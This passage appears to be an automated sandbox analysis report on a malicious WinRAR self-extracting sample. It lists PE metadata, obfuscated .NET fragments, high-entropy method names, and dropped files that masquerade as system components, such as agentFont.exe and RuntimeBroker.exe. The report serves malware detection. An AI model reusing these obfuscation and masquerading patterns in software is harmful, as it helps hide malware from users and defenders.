                                Source: QH67JSdZWl.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: QH67JSdZWl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe, 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp, f5Mb10zb.exe, 00000001.00000000.1667497208.0000000000753000.00000002.00000001.01000000.00000009.sdmp, f5Mb10zb.exe, 00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe, 00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe.0.dr
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, mf04Loader.dll.0.dr
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, mf04Loader.dll.0.dr
                                Source: Binary string: D:\Projects\WinRAR\SFX\build\sfxrar64\Release\sfxrar.pdb source: QH67JSdZWl.exe
                                Source: QH67JSdZWl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: QH67JSdZWl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: QH67JSdZWl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: QH67JSdZWl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: QH67JSdZWl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, muXnpA6lFel6HrDvFg0.cs .Net Code: Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777245)),Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777259))})
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, muXnpA6lFel6HrDvFg0.cs .Net Code: Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777245)),Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777259))})
                                Source: mf04Loader.dll.0.dr Static PE information: 0x98C03CC5 [Sat Mar 18 06:55:01 2051 UTC]
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6140703
                                Source: QH67JSdZWl.exe Static PE information: section name: .didat
                                Source: f5Mb10zb.exe.0.dr Static PE information: section name: .didat
                                Source: mf04Loader.dll.0.dr Static PE information: section name: fothk
                                Source: mf04Loader.dll.0.dr Static PE information: section name: _RDATA
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: 1_2_0073F640 push ecx; ret 1_2_0073F653
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: 1_2_0073EB78 push eax; ret 1_2_0073EB96
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 5_2_00007FFD9B874B9E push esp; retf 5_2_00007FFD9B874BA3
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 5_2_00007FFD9B874354 push ecx; ret 5_2_00007FFD9B87435C
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 5_2_00007FFD9B8708E8 push FFFFFFE9h; ret 5_2_00007FFD9B870909
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 5_2_00007FFD9B9D0078 pushad ; ret 5_2_00007FFD9B9D0079
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 5_2_00007FFD9B9D30C6 push edx; ret 5_2_00007FFD9B9D30C7
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00007FFD9B76D2A5 pushad ; iretd 24_2_00007FFD9B76D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00007FFD9B952316 push 8B485F94h; iretd 24_2_00007FFD9B95231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_00007FFD9B76D2A5 pushad ; iretd 25_2_00007FFD9B76D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_00007FFD9B952316 push 8B485F94h; iretd 25_2_00007FFD9B95231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00007FFD9B78D2A5 pushad ; iretd 27_2_00007FFD9B78D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00007FFD9B972316 push 8B485F92h; iretd 27_2_00007FFD9B97231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FFD9B77D2A5 pushad ; iretd 29_2_00007FFD9B77D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FFD9B962316 push 8B485F93h; iretd 29_2_00007FFD9B96231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FFD9B76D2A5 pushad ; iretd 31_2_00007FFD9B76D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FFD9B952316 push 8B485F94h; iretd 31_2_00007FFD9B95231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD9B79D2A5 pushad ; iretd 32_2_00007FFD9B79D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD9B8B1FF2 push esp; iretd 32_2_00007FFD9B8B2033
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD9B8B85FA push ebx; ret 32_2_00007FFD9B8B862A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD9B8B85D3 push ebx; ret 32_2_00007FFD9B8B862A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD9B8B1DC5 push esp; iretd 32_2_00007FFD9B8B2033
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD9B982316 push 8B485F91h; iretd 32_2_00007FFD9B98231B
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 38_2_00007FFD9B8C6235 pushad ; retf 38_2_00007FFD9B8C623D
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 38_2_00007FFD9B8A4B9E push esp; retf 38_2_00007FFD9B8A4BA3
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 38_2_00007FFD9B8A4354 push ecx; ret 38_2_00007FFD9B8A435C
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 38_2_00007FFD9B8A08E8 push FFFFFFE9h; ret 38_2_00007FFD9B8A0909
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 39_2_00007FFD9B884B9E push esp; retf 39_2_00007FFD9B884BA3
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 39_2_00007FFD9B884354 push ecx; ret 39_2_00007FFD9B88435C
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 39_2_00007FFD9B8808E8 push FFFFFFE9h; ret 39_2_00007FFD9B880909
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Code function: 39_2_00007FFD9B8A6235 pushad ; retf 39_2_00007FFD9B8A623D
                                Source: agentFont.exe.1.dr Static PE information: section name: .text entropy: 7.474275009334667
                                Source: DONEBnCAFZiOynZWpVVmZLvNQeA.exe.5.dr Static PE information: section name: .text entropy: 7.474275009334667
                                Source: RuntimeBroker.exe.5.dr Static PE information: section name: .text entropy: 7.474275009334667
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, Ej7lweaRL3K6o0pj3Vp.csHigh entropy of concatenated method names: 'TKqFpgy5hI', 'XBOF7QmGFVo5YqA8g4uJ', 'mGIAJWmGyjDy9yW2uUV8', 'YZOs6JmG0WTHLRRLsNaE', 'g1JK1jmGZQRmrtC2QHkM', 'tboFxgmGmgaKLybYEsay', 'olOFPGmGaHo29ubsGc82', 'QILeoqmGpEf0dulK7PXb', 'eOQA6OmGN1jrvXsMS9sF', 'AsrFos2b0u'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, WSgPqMZI3SDivoeH4jk.csHigh entropy of concatenated method names: 'IHEZKyn8fI', 'of2u4FmeBZbTqSBjUnWY', 'LPpFR8me9DMlwjYly1sO', 'sD78t6mexgegOnB0XG8n', 'f2DPcMmeireQ0yuuP3cK', 'WclSLameseU4u6N1aDg3', 'E94', 'P9X', 'vmethod_0', 'Ga5myTeIe7p'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, muXnpA6lFel6HrDvFg0.csHigh entropy of concatenated method names: 'LYHCebmkQrl7E5UTkDia', 'XP4GZQmkWwuWkjv9hmtR', 'S14CfMmgp7', 'VVRrExmkYcub0Dr7H8r4', 'gmNl4Imkl2KgWXegxcTh', 'A2TXc7mkEZ0Sf9yZVRrG', 'YB9sDWmk1XRgqo2l0vcv', 'Lj8UyEmkTqTXOoVvbx93', 'c8Ea45mkndmXykWOmFC2', 'sCE0Qqmkvc9l4A38wegW'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, pJVNrSa0q7vP9SOWgDt.csHigh entropy of concatenated method names: 'wwFapgpHZh', 'yhhaNcrHKH', 'NJcaOVnyAm', 'kNuaXqfDH0', 'NkQh5KmtHGNw47xPU1rW', 'qW6cQjmtgCub2ng7gq6f', 'cINhfWmtuWiY6xYt9OVB', 'wQchZWmtYhvHZ0aXMtRm', 'iflWdSmtluv7ngOOYNTJ', 'nwwdEkmtEEI2hyGVPuZX'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, UREhymqh2rnbPsF8SGj.csHigh entropy of concatenated method names: 'NoeqkYqGqO', 'oTZqzuvv4w', 'lB5qxthoCU', 'GboqBnXltE', 'VreqiBCVf2', 'ldSqsDmnQF', 'PhNqrGtDK7', 'lX5qbn3e60', 'PkiqR9sf2n', 'H82qdURirW'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, xJ20a4ZhaJlZ6KqcbX3.csHigh entropy of concatenated method names: 'kF2Z5cwkAr', 'NHCZ6IiD0j', 'BUrZCGjYFs', 'FZhYtbmcXGS91yUj0Hgu', 'kBMhBkmcJsKv4sjMe625', 'rONsTAmcNSgjlfqaQC71', 'h3qnI8mcOwaTjRltOghP', 'pVPZxYFDNI', 't7bZBaCFxR', 'JmKZiaWCrc'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, DOM9BRtDs274yLr5FGi.csHigh entropy of concatenated method names: 'aA3t7Wt5fQ', 'D24t5ps7EU', 'Uf3t6W6LlQ', 'sL3tCZtHvp', 'mIqtkGiBoo', 'cZrRufms9DAx9atA627A', 'qMVImYmsxDGZ0pR7WSZS', 'DvMvUDmsBc4Z1YbThaMy', 'uVGaUbmsiSWohwMaTUZ2', 'O3gJfumssKDp7PPfLYdU'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, KvrlrUOgVLeXbrEBJOt.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'aOZ310mSshggsG1tQMwf', 'wnuoB5mSrTEw7CBn2ywM', 'Ti3strmSbMvG52Ag43sX', 'aZHcvymSR2hAXWWlOOwk'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, z1mZn0p1vITKfZ1Ow9W.csHigh entropy of concatenated method names: 'h6ipteI9KL', 'vZjlCVmcdh4L2cnWgZTr', 'AXMhGBmcD23AGydwFL8b', 'fN3P9Qmcba3odevSMo4L', 'fap6XImcRy8ScOeuY1mE', 'jHjigQmcfQeXYI1iQk8e', 'jIxXYMmc751SvcHGedRG', 'p4rpnhCoPF', 'B4Epviaa2g', 'LExpwHwJ9H'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, Wa8hY6uwYbCVUgWGpdH.csHigh entropy of concatenated method names: 'Spj1WZIWa2', 'Tq01gLROdo', 'w6k72gmAriXEFOOyBOFL', 'FSIESEmAikVNHaSpmpDx', 'BE6T5dmAsVfkU95Oc9GD', 'tONN2TmAbk6nMsfBgm6M', 'FDhoE1mAROvFJ66bnkP0', 'jKg11jhcPh', 'RSMcQXmADJHeLicumg32', 'NfCUT7mAfXOLE8G42OUn'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, W7rXWGxZmcPNoueJEj.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'B9hi9ZQa7'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, jubINjO25XbxhhZkngx.csHigh entropy of concatenated method names: 'QXUOFIm4xkUjP2QvcHpU', 'qTTU1Xm4hqyWahkgCQeJ', 'tKeGLPm49rThcdsmKclF', 'ksPgVSSRoc', 'tgJlBUm4iK7XtNf8nPR7', 'bn1Rr8m4sMtirL26w6M4', 'dOxHNAm4rTjQhT9GBFOb', 'Sqiyoim4bbiUrSOIespn', 'xQaumLM2ti', 'yfZHZjm4fxaxIngKXkyj'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, sTqRoZTxTCpjN9btjmC.csHigh entropy of concatenated method names: 'WAJTijMOGl', 'LXOTs2f5NX', 'gGgTrtnLH4', 'BcmjufmhvHaihfiqvC0C', 'zRLiOkmhTel5LExQdTTu', 'u6kkb8mhnWfAB1SijKsy', 'OPQ9bamhwMKOPPB2ouys', 'T5S7YSmh2Hajcpcf1REj', 'wdcIjGmhIsWFf2w2LIjl'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, a2s64P1t3UxBtAnHTwB.csHigh entropy of concatenated method names: 'P7l1j5qO8g', 'MeKAJEm8p5L0JBORf2md', 'aTKLC8m80oq8IkrIXevC', 'Utcncqm8Z9gQ2oLRh9Nq', 'wA3iD9m8NNoFvCaGvTjM', 'WtA1Mtn97n', 'q561KtEMQ9', 'zXY1eWHmoF', 'KT5yUqm8aXI0x1xwoihS', 'QECVJ0m8od3gPtB52Jiq'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, WffPcWuJu8GMU2VJZs8.csHigh entropy of concatenated method names: 'Dispose', 'zGUuWC22rq', 'dVLugLx0ty', 'MrauuwB4tx', 'rS0D26mLFjjNl9xbh1Lj', 'u9XlSvmLy6RKlkBWTPxd', 'rIQN3GmL0WN8FE2LkeqX', 'v4XBW7mLZdqXiH8miD5S', 'iWhx8ymLpxe7xincKYEW'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, XifQQ8yeYeEwcASPZDc.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'aY9mNyJFt3k', 'gpxmymY15FW', 'e3sHjAmM8Idi9riLRMv8', 'dhjfDGmMhP3o4ZpjJYuC', 'tVvsSrmM9MTdF6BOvLJk', 'DNwcajmMxyPFnap3M3lg', 'ONa3EHmMB3QsL87bCufx'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, wvAmWIOaIEhCh3H6lwZ.csHigh entropy of concatenated method names: 'gyQOyrSJYR', 'qbYO0CDaf5', 'Qs6OZe5l6t', 'kJHOpY92bU', 'GR5ONSJNaQ', 'RtWOO18qgq', 'zuGOXaYQYZ', 'GOgOJtGDLE', 'vR8OQUrVZl', 'im8OWL17eQ'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, ckoxeNkAQf7pYTehrs1.csHigh entropy of concatenated method names: 'eUJmZeWswUp', 'y24mZcjwAoe', 'waCmZPhQUdR', 'RF5mZSDUps5', 'ddYmZjMeFZy', 'KqxmZ4cN6Fn', 'lG1mZLAcoVI', 'e6mV0CjKN5', 'hTvmZA7mIjr', 'HU1mZ8kk6oR'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, Yv002fU2SLIWvEDEEmT.csHigh entropy of concatenated method names: 'DV2UUeCEUE', 'IC4U3pxaKA', 'RWnUqOWEFY', 'G7JUtnXrM6', 'IPIUGpfVJp', 'H7ensdmB735fIvlsM1nG', 'CbHXL6mBDMkJCWweqI3N', 'SO2MPqmBfYT9gf5UvKIs', 'Aqu2qomB5dSdrSD9rRCu', 'sKYohLmB68r9RoeBh8fT'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, WTE5ySZPYAxTcYwFpmn.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'kkRmNXVY0Fw', 'gpxmymY15FW', 'nmaeY4mebVB05oemeUpl', 'fgAxdsmeR96ZbwaiRBP4', 'ya7c9xmedONtVWLIJKSU'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, zohohC0HuLk0RZJTvso.csHigh entropy of concatenated method names: 'UTn0qjFNbX', 'boM0tIp2lj', 'ihB0GMNIeI', 'ukga2hmKsQWy4CXCtbPr', 'N6iftRmKrZjhCBaL5Z8r', 'M41sQAmKBkckjIDvwfAm', 'SXbiShmKifRN7YtLFTqI', 'OVK02oSUQK', 'hnt0If1xhI', 'p3mYGNmK9E8LgQV0jkfv'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, xgsZOkmfmLY0TQZZ8v5.csHigh entropy of concatenated method names: 'P9X', 'NiNm513INu', 'QufmNoZBmi1', 'imethod_0', 'YuPm6sXlLJ', 'my3MdnmqCKjUsfIDcxef', 'gM6PHUmqkUxkjLZKgVYm', 'H3L1aMmq5EesaPDEv9tn', 'ue5AY0mq6BehjVvWHe3f', 'K8gbp2mqVabW9helFQST'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, oFD4YCNigrYKJxBYvJx.csHigh entropy of concatenated method names: 'v8HN5NwCLX', 'IPymd3mSnII4DOPSgVuY', 'I1Qn5JmS1olsRXvpZBZK', 'JRU7KZmSTsyYtKp0fGTA', 'EItaHumSv9lpXWUwBtLc', 'lKVqLCmSwd4DDJAMweKr', 'P9X', 'vmethod_0', 'HDfmyqO0MR6', 'imethod_0'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, qfopIWpKIoqvjVpFdVg.csHigh entropy of concatenated method names: 'jAIpcUdTQP', 'XykpPIAtM3', 'c4n6DkmckVepKerFVR1P', 'c26Ms7mc6TAiNdmSxD2s', 'VGQdY6mcC7W09HFJ4s4x', 'seBcSKmcVMGlLwMej4hd', 'FoZTJymczuOaBSTLPwf1', 'QjGYdvmPoTdeqS4LhpZn', 'MeB5jcmPm4ITKIPEv8Mg', 'GWUKfdmPaKtkq6imX54w'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, E77rDtvWgcr9kpRrl64.csHigh entropy of concatenated method names: 'kFy2mwnVOy', 'CGUiUAmxG3jRXn8JqH3b', 'FUpC1FmxqvV2Tw7URxmG', 'fXSgVgmxt9iTNGIrsB4Y', 'zMmvuu9WH9', 'QoYvHTCRKy', 'xphvY81TLn', 'Tl9vlgB8wI', 'JsjvEUvF4M', 'rCbv1tiTS5'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, kYjPt6f4T86huM442EQ.csHigh entropy of concatenated method names: 'quxmN38dRah', 'HY0mZU8K1yA', 'NkpPs0m6HPeMkWlVcABc', 'J77QMOm6gKGa78MkGN7Y', 'iYQyUcm6ueU2Jck5N1kH', 'D6Omwom6YlfXk9IPreRN', 'LJoffYm6THwMyCXUAqaM', 'qWGGoKm6EoGltdSG3s8b', 'imx5Ubm61Fi9mkUngkty', 'hgTqdem6nVlqTvg4ilTe'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, d18TymLBEsK6BX6EeSO.csHigh entropy of concatenated method names: 'aa6mNIaNCrT', 'nIELsy2NPh', 'G1eLrwvY6o', 'yabLbijEYn', 'wNXWuKmftCJhDu74Alru', 'aKj7jSmfGox8skHWgjtA', 'lvYXfjmfMMuuqTtI34Ns', 'pyDR89mfKuiFSFNYfk9X', 'velPeymfemFcqhAQSQlg', 'yd6M2omfc2C9eS56CxrJ'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, GqOalmT5Z2aqYkP1sQv.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'nkDTCroE25', 'p91mNE5SRKe', 'TPZQPHmhLAsvH4RFZJbq', 'ohnGeWmhjd7Vn1iOSrQX', 'fiaPfTmh4OhI0kkKa9SE', 'w9l2osmhAE7U5DS6xC8V', 'tn3Fjsmh87fUAqwhHdNZ'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, A0BGNotVOjpeM7MEYF2.csHigh entropy of concatenated method names: 'tHwGor8994', 'lpBGmZM9WF', 'D8SGa8ienM', 'MNuGFBe4g4', 'iW6GyQ6x0w', 'NPFG0N0UCN', 'YCpXuamsf68fi7mRCHmM', 'KBDM87msdv2Z5IApblCs', 'jk6VX3msDaEpdifcwGWN', 'w3ICyPms7era5gdcKBVM'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, H6dPO6KNSIL0vqaACcI.csHigh entropy of concatenated method names: 'aTIKXhpBbb', 'UALKJFem9x', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'R64KQn8w80', 'method_2', 'uc7'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, PTFUPT1Lfm14KABDSnU.csHigh entropy of concatenated method names: 'ySx1iD4dbC', 'O6b1sJcBlQ', 'QKk1rUSW8Z', 'lD6Qk4m8HOtnHHq8plT1', 'AHq6jPm8gccdSsClFi9H', 'l8hotem8uOORuxMwhPR5', 'teY18hJ31j', 'OWr1hWeLg3', 'Awu19QJCxa', 'e2UAfSm8XL6YDEtMLFQM'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, U4N86PmVelt9SpclLhc.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'qH9mNmOYdvL', 'gpxmymY15FW', 'cREgmTmtmcO7VmF6k4NO', 'NRhjTGmtaoS4rxWgsdPh', 'FZ69CCmtFawbc9vnArX5', 'Lmf9Zpmty4d4TB58twxa'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, MlVihGqFST1nAcEsUuC.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'Pieq09iZyh', 'Write', 'IoSqZoBSqW', 'T81qpq9vjV', 'Flush', 'vl7'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, KXJGFQnJ0onInRtHpWu.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'Bs0mNvyyGrs', 'RyLmNwByk1m', 'iLO5U9mhVK9h0wiugXmQ', 'DsKrWFmhzn65HaA2NeMk', 'qmBa0Km9ox58T4mZvZjt', 'F7XYsgm9mcWlw4WBXmPa', 'Nc7qATm9aafUEaM7tJY3', 'Rj49xDm9FNiEuTWoDDql'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, hf4IQNMBLCi30ntbGjA.csHigh entropy of concatenated method names: 'G2YMs4f5Zh', 'dcZMrF8smS', 'LqsMbMdrrx', 'NZnMRa3X3n', 'EERMd8kaFh', 'DlB3ZnmbBMlgbNgy0rAW', 'mgaTnjmbisTheqTxCKyr', 'JH0obFmbsk3DtTOGLREw', 'SMxocHmb9DsDqhZd6FCi', 'caJaR9mbxCoueAVQOZAe'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, ec0tumaKXXhrx8qodaf.csHigh entropy of concatenated method names: 'PiuahQ9JvE', 'R1Qa9uZWc9', 'qJwpNCmthdOxjjpx76EK', 'uYlZD3mtAGgtCsAlsAvP', 'qiHwtrmt8J2GEX8O1AgV', 'puhr0Gmt9ERQvZouwgAS', 'QkRasjDCAi', 'm7KxwUmtsr2T1ptbswKe', 'ARubsYmtr3cZrT9e46vs', 'Dt5fZ2mtB24y89i4ycDc'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, ULTSfcmgEyu7BA5nxAM.csHigh entropy of concatenated method names: 'LHumHxvpY2', 'DsZmYytOuu', 'L1cmlpmddf', 'QrVw9Ymqv7s8ip8iLnS1', 'tjaK1nmqTMvkHjBp3hFA', 't6kjwYmqnlWb6RPacysc', 'sICDTAmqwOFQqkTOgHS3', 'Mm25Numq2XoXcmJmFk2B', 'yY0sYkmqI8OkZsE9PNG6'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, JUb8M3kE5TQsvVOZ4Um.csHigh entropy of concatenated method names: 'WWIkGBkTFV', 'R2QkMmde63', 'oTrkK3BlIl', 'CPakeB1VHH', 'asMkcQoq66', 'XfhkPGkRpx', 'X1VkSu2Zsc', 'MQ5kjCjD1A', 'SXFk4qSKSC', 'xQLkLDbajw'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, LtUYn9NYlPAAPt0m6iv.csHigh entropy of concatenated method names: 'RJTNT8oDUS', 'Hsm7EHmPBYrjZFfdIYbT', 'nhxbnsmPirhnZUs7Zijg', 'KmT9yxmPs33qCW9woI7D', 'T72NEPQ8i7', 'SufcbJmPhOHUv5hIg1E6', 'niXVeXmP9ypSnKaZNcgL', 'tD9h5ZmPAJoe3jsRdpBf', 'lIilU1mP8wV9sQbnHd3i'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, AiLMyGGKkswp3G5F2Ns.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, P2Do2iG8YkD0s7oBLbB.csHigh entropy of concatenated method names: 'tAXG9Wy76h', 'rL3GxEMrT2', 'dCqGBrl0UA', 'cH9Gi3Vab0', 'ShMGsYQEmE', 'PARGrBaLyG', 'IZVGbMPaCU', 'dMHGRcmevy', 'mgeGdr45Cf', 'FQaGDXuqFN'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, NyHd405K4MvEe9T5Egm.csHigh entropy of concatenated method names: 'wvB5ckO9Ty', 'DLv5PMsyIx', 'T6w5StrJDf', 'WOr5j3oy0E', 'Dispose', 'aecYO2mCIeKUT6HUGA5i', 'ULfeXbmCwmAAD9ij8d1R', 'sPDylVmC2kTaSlBsKvwx', 'eZBHmOmCU5WThLlDCd5L', 'VLybgYmC3Kg8fw04rM1m'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, VKXPc0Tgwq6aE6YGU83.csHigh entropy of concatenated method names: 'REgTTH6Wte', 'X5mdq7m85iTDyO47DCOo', 'ItCw8Bm86IMwD9vQJWYD', 'h5tNPnm8Cuc7Kbpp3Hp3', 'zt13vom8kxcx3480QLav', 'soaTHtRIX7', 'nuKgnUm8bjTmlMVWBeCV', 'umnRS4m8s9GvZxdauTsF', 'jJjXODm8rBgvutxM0wrW', 'tlIxnam8RvkwyZEy1MqN'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, g9aCDC5WobKqLcofMGG.csHigh entropy of concatenated method names: 'iRm5H5Wtot', 'EcH51n2ONy', 'BWP5vfFfH1', 'MX05wGy7e3', 'TZY52RmMXY', 'GOu5IUZlaT', 'k5T5UZbOd5', 'My1535ya23', 'Dispose', 'buZmfwmCYhpo6v797Pkg'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, wmMxGRFRdBbhZWaokpO.csHigh entropy of concatenated method names: 'mX0yFiEoo7', 'UTUyyqZUbC', 'eDpy0dUOwl', 'C9QftXmMXhaTXMK5txFv', 'bB8w4OmMJRKpuHIX2fYx', 'Fu2q9nmMNLtN9uyNhoyE', 'uO7XJimMOZkJKJDpUUDY', 'rQWyJjM9dM', 'zO7qZJmMW7XBdtkxgM9H', 'iRVZI4mMglcD7PN1IUG2'
